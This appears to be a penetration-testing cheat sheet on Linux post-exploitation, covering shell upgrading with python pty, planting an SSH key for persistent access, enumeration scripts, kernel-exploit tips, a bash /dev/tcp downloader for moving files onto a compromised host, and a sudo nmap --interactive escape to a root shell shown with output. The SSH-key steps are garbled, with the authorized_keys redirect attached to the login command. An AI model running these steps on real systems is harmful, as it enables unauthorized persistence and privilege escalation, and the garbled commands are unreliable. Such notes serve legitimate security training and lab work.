Linux Enumeration
Spawning a Shell
So you just got shell on a machine? Well the first thing to do would probably be to spawn a new shell. This can be done with:
python -c 'import pty; pty.spawn("/bin/sh")'
Alternatively, another good idea would be to use SSH in order to get us an even better shell. The first step is to go on our own machine and generate a key.
ssh-keygen -f mykey
After doing so cat mykey.pub and copy the all of the contents.
On the target machine make a .ssh directory in the user's home folder.
mkdir ~/.ssh
cd ~/.ssh
Then echo out key into the authorized_keys file.
echo "<my key contents>"
Everything is now good to go. In order to log in just SSH normally with the key option.
ssh -i mykey <USER>@<IP ADDRESS> >> authorized_keys
Linux Enumeration Scripts
There are some great scripts that aid in linux enumeration.
- lineum
- unix-privesc-checker
These can look through the whole system for interesting information.
Generally the things to look for in linux are root services and processes as well as OS version number. Configuration files can also be a source of interesting information such as credentials.
Kernel Exploits
Compiling exploits might be a problem when trying to enumerate. However, the Holy Build Box is perfect for this. It compiles things with no issue and they will run as soon as you transfer over the target. However, be smart about running exploits.
If it's not working find out why and ignore other similar exploits.
- Is the exploit giving out an mmap error?
- This is some memory protection thing. That means that the exploit is useless on the target and that you shouldn't waste any more time using similar exploits. So CTRL - F through other exploits and compare with the one you just used to see if they use the same functions. If they do then move on.
- Does the exploit rely on something?
- For example the exploit might need access to a certain file. If it's not there then don't bother wasting time compiling or running the exploit.
Basicially when it comes to kernel exploits. Be smart and read carefully.
Users
Linux makes unique users for important services. For example a www user that hosts the HTTP server.
Knowing this information can aid us. By viewing the /etc/passwd file we can see if a user like this exists.
File Transfering
Usually machines have some sort of file transfer capability. Like wget, curl, ftp, etc. However, in case they don't, there are some other things that we can do.
Linux Wget Script
This is a wget script that uses bash.
Usage:
__wget http://example.com/
function __wget() {
: ${DEBUG:=0}
local URL=$1
local tag="Connection: close"
local mark=0
if [ -z "${URL}" ]; then
printf "Usage: %s \"URL\" [e.g.: %s http://www.google.com/]" \
"${FUNCNAME[0]}" "${FUNCNAME[0]}"
return 1;
fi
read proto server path <<<$(echo ${URL//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
[[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
[[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
[[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
while read line; do
[[ $mark -eq 1 ]] && echo $line
if [[ "${line}" =~ "${tag}" ]]; then
mark=1
fi
done <&3
exec 3>&-
}
Try Abusing Existing Functionality
Nmap
If nmap is present on the machine try using interactive mode to see if it grants root privleges.
bash-3.2$ which nmap
which
/usr/bin/nmap
bash-3.2$ sudo nmap --interactive
Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# whoami
whoami
root
Mess with Sudo
Attempt things like sudo passwd root to see how things work.